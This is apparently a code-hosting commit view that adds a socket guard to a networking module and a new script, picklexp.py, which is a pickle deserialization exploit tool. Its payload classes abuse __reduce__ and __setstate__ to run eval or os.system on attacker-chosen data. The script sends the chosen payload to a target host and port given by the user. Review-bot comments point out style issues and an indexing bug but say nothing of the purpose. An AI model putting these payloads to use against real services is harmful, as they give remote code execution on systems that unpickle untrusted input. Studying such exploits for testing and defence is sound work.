Add exploit tester!
parent
b28c9925b9
commit
96d9e430b2
13
networker.py
13
networker.py
@ -100,14 +100,19 @@ class Connection:
|
||||
threads = dict()
|
||||
actives = dict()
|
||||
def __init__(self, binder, translator, onconn, onrecv, onend):
|
||||
self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
||||
self.socket.bind(binder)
|
||||
self.socket.listen(8)
|
||||
if binder != None:
|
||||
self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
||||
self.socket.bind(binder)
|
||||
self.socket.listen(8)
|
||||
else:
|
||||
self.socket = None
|
||||
self.translator = translator
|
||||
self.onconn = onconn
|
||||
self.onrecv = onrecv
|
||||
self.onend = onend
|
||||
def listener(self):
|
||||
if self.socket == None:
|
||||
return
|
||||
while self.active:
|
||||
s, a = self.socket.accept()
|
||||
ac = a[0] + ":" + str(a[1])
|
||||
@ -193,7 +198,7 @@ class Connection:
|
||||
break
|
||||
time.sleep(0.0001)
|
||||
self.threads.clear()
|
||||
self.socket.close()
|
||||
if self.socket != None: self.socket.close()
|
||||
|
||||
def addresses(self):
|
||||
if self.active:
|
||||
|
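Review bot: The new guards compare with `== None` / `!= None` (in `__init__`, in `listener`, and on the `self.socket.close()` line of the second hunk); identity tests are the idiomatic form and cannot be affected by a custom `__eq__`: `if binder is not None:` and `if self.socket is None:`. Now that `self.socket` may be `None`, any other method outside these hunks that touches `self.socket` presumably needs the same guard. Both hunks cut through their enclosing methods, so this cannot be confirmed from the visible lines.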
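--- /dev/null
+++ b/picklexp.py
@@ -0,0 +1,95 @@
+#BSD 3-Clause, (C) Alfred Manville 2022
+#Be RESPONSIBLE when using this!
+import networker as net
+import pickle
+import traceback
+import sys
+
+#Payloads:
+#State payloads only work if the Object is available at the target
+
+class StatePXP:
+def __init__(self, data):
+self.data = data
+def __getstate__(self):
+return self.data
+def __setstate__(self, state):
+self.data = state
+print(self.data)
+
+class ReducePXP:
+def __init__(self, data):
+self.data = data
+def __reduce__(self):
+return print, (self.data,)
+
+class StateEXP:
+def __init__(self, data):
+self.data = data
+def __getstate__(self):
+return self.data
+def __setstate__(self, state):
+self.data = state
+eval(self.data)
+
+class ReduceEXP:
+def __init__(self, data):
+self.data = data
+def __reduce__(self):
+return eval, (self.data,)
+
+class ReduceSXP:
+def __init__(self, data):
+self.data = data
+def __reduce__(self):
+import os
+return os.system, (self.data,)
+
+payloads = (StatePXP(""), ReducePXP(""), StateEXP(""), ReduceEXP(""), ReduceSXP(""))
+payload = None
+taddr = ""
+tport = 0
+plid = 0
+pldata = ""
+
+def onx(a):
+pass
+
+def ony(a, m):
+pass
+
+def main():
+conn = net.Connection(None, net.PickleTranslate(), onx, ony, onx)
+print("Running Exploit @ " + taddr + ":" + str(tport))
+print("Exploit: " + str(type(payload)) + " ; Data: " + pldata)
+try:
+conn.connect((taddr, tport))
+print("Exploiting...")
+conn.send(taddr+":"+str(tport), payload)
+print("Exploited!")
+except:
+print(traceback.format_exc())
+conn.close()
+exit
+
+if __name__ == "__main__":
+print("Python PicklExp (C) Alfred Manville 2022 BSD-3-Clause")
+if len(sys.argv) > 1:
+taddr = sys.argv[1]
+else:
+taddr = input("Enter the target address: ")
+if len(sys.argv) > 2:
+tport = int(sys.argv[2])
+else:
+tport = int(input("Enter the target port: "))
+if len(sys.argv) > 3:
+plid = int(sys.argv[3]) - 1
+else:
+plid = int(input("Enter the payload position " + str(payloads) + " : ")) - 1
+if len(sys.argv) > 4:
+pldata = sys.argv[4]
+else:
+pldata = input("Enter the payload data: ")
+payload = payloads[plid]
+payload.data = pldata
+main()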
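Review bot: The payload position read in the `__main__` block is never range-checked, so entering 0 makes `plid` equal to -1 and `payloads[plid]` silently selects the last entry, `ReduceSXP` (the `os.system` one), instead of failing. Reject out-of-range values before indexing, e.g. `if not 0 <= plid < len(payloads): sys.exit("payload position out of range")`. Separately, the bare `exit` at the end of `main()` is a name expression that does nothing and can be dropped, and `except:` would be better as `except Exception:` so that Ctrl-C is not swallowed. The page has lost indentation, so whether `conn.close()` runs on both the success and failure paths cannot be told from here.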